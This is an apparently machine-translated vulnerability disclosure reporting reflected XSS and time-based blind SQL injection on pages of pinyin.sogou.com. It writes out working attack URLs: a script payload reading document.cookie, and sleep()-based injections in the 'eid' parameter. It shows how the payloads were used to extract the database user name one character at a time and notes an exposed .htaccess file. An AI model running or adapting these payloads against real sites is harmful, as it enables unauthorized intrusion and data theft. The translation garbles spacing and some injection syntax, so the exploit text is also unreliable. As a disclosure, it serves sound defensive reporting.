Soudog pinyin-SQL blind injection and reflective XSS
The reflected XSS is one. We recommend that you look for the storage type:
Http://pinyin.sogou.com//wurehanzi/libs/Pagination/examples/ArrayData.php? Page = 1' % 22 () % 26% 25 <ScRiPt % 20> alert (document. cookie) </ScRiPt>
Blind note, parameter eid
Http://pinyin.sogou.com/wurehanzi/digg.php? Ac = digg & digg = 1 & eid = if (length (user ()> 22, sleep (1), 0)
For other problematic pages, please review:
Pinyin.sogou.com/wurehanzi/get_ajax_data.php? Wordnum = 1
Pinyin.sogou.com/wurehanzi/post.php
. Htaccess file downloadable:
/Wurehanzi/libs/Pagination/examples/. htaccess
Test:
The length of the user is 23.
The first letter ascii code is 105, which is the letter I:
Http://pinyin.sogou.com/wurehanzi/digg.php? Ac = digg & digg = 1 & eid = if (ascii (mid (user (), 105) =, sleep (2), 0)
Chr (105) = 'I'
Chr (109) = 'M'
Chr (101) = 'E'
Chr (95) = '_'
Chr (115) ='s'
Chr (107) = 'K'
Chr (105) = 'I'
Chr (110) = 'n'
Chr (115) ='s'
Well, I guess I can find out what the user name should be ime_skin and I will try again. No matter what it is, please come up with me.
Solution:
Maybe sogou's brother forgot these tiny points... I clicked your pop-up window and found it...